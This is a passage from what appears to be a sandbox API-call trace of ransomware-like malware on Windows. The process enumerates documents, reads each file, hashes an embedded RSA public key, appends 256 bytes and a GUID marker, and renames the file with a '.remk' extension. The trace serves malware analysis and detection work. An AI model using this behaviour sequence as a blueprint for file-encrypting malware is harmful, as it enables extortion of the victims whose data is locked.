KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.685] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.685] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.685] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.685] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.686] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.686] GetLastError () returned 0x0 [0233.686] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.686] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.686] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.686] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.686] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.686] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.687] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1298b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.687] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.687] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.688] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.688] CloseHandle (hObject=0x640) returned 1 [0233.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0233.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b8 [0233.690] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\FHmONqV v2JkG3.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\fhmonqv v2jkg3.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\FHmONqV v2JkG3.ots.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\fhmonqv v2jkg3.ots.remk")) returned 1 [0233.692] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbee6ae0, ftCreationTime.dwHighDateTime=0x1d5da2c, ftLastAccessTime.dwLowDateTime=0x6c4c5470, ftLastAccessTime.dwHighDateTime=0x1d5d8f0, ftLastWriteTime.dwLowDateTime=0x6c4c5470, ftLastWriteTime.dwHighDateTime=0x1d5d8f0, nFileSizeHigh=0x0, nFileSizeLow=0x19a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grljDT8nx55.pps", cAlternateFileName="GRLJDT~1.PPS")) returned 1 [0233.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a46c0 [0233.692] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\grljDT8nx55.pps") returned=".pps" [0233.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\grljDT8nx55.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\grljdt8nx55.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.694] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=6563) returned 1 [0233.694] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.696] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x197d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.697] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.698] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x19a3, lpOverlapped=0x0) returned 1 [0233.699] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.699] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.699] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.699] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.700] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.700] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.700] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.701] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.701] GetLastError () returned 0x0 [0233.701] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.701] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.701] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.701] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.701] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.701] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.702] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x19a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.702] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.702] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.702] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.702] CloseHandle (hObject=0x640) returned 1 [0233.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e600 [0233.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b8 [0233.704] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\grljDT8nx55.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\grljdt8nx55.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\grljDT8nx55.pps.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\grljdt8nx55.pps.remk")) returned 1 [0233.705] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43067f80, ftCreationTime.dwHighDateTime=0x1d5e563, ftLastAccessTime.dwLowDateTime=0x36239610, ftLastAccessTime.dwHighDateTime=0x1d5dd7d, ftLastWriteTime.dwLowDateTime=0x36239610, ftLastWriteTime.dwHighDateTime=0x1d5dd7d, nFileSizeHigh=0x0, nFileSizeLow=0x18a9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HHueX3S0ibdFq.odt", cAlternateFileName="HHUEX3~1.ODT")) returned 1 [0233.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a46c0 [0233.705] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\HHueX3S0ibdFq.odt") returned=".odt" [0233.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\HHueX3S0ibdFq.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\hhuex3s0ibdfq.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.706] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=101022) returned 1 [0233.706] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.709] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18a78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.709] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.711] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x18a9e, lpOverlapped=0x0) returned 1 [0233.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.712] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.713] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.713] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.713] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.714] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.714] GetLastError () returned 0x0 [0233.714] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.714] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.714] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.714] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.714] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.715] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.715] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18a9e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.715] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.716] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.716] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.716] CloseHandle (hObject=0x640) returned 1 [0233.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e600 [0233.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b8 [0233.718] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\HHueX3S0ibdFq.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\hhuex3s0ibdfq.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\HHueX3S0ibdFq.odt.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\hhuex3s0ibdfq.odt.remk")) returned 1 [0233.719] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725af590, ftCreationTime.dwHighDateTime=0x1d5d898, ftLastAccessTime.dwLowDateTime=0x1614b2b0, ftLastAccessTime.dwHighDateTime=0x1d5e1f5, ftLastWriteTime.dwLowDateTime=0x1614b2b0, ftLastWriteTime.dwHighDateTime=0x1d5e1f5, nFileSizeHigh=0x0, nFileSizeLow=0x4689, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p2Sojk8t7gJih823M5.pptx", cAlternateFileName="P2SOJK~1.PPT")) returned 1 [0233.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a46c0 [0233.720] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\p2Sojk8t7gJih823M5.pptx") returned=".pptx" [0233.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\p2Sojk8t7gJih823M5.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\p2sojk8t7gjih823m5.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.721] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=18057) returned 1 [0233.721] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.724] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x4663, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.724] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.725] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x4689, lpOverlapped=0x0) returned 1 [0233.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.727] lstrlenA (lpString="-----BEGIN PUBLIC 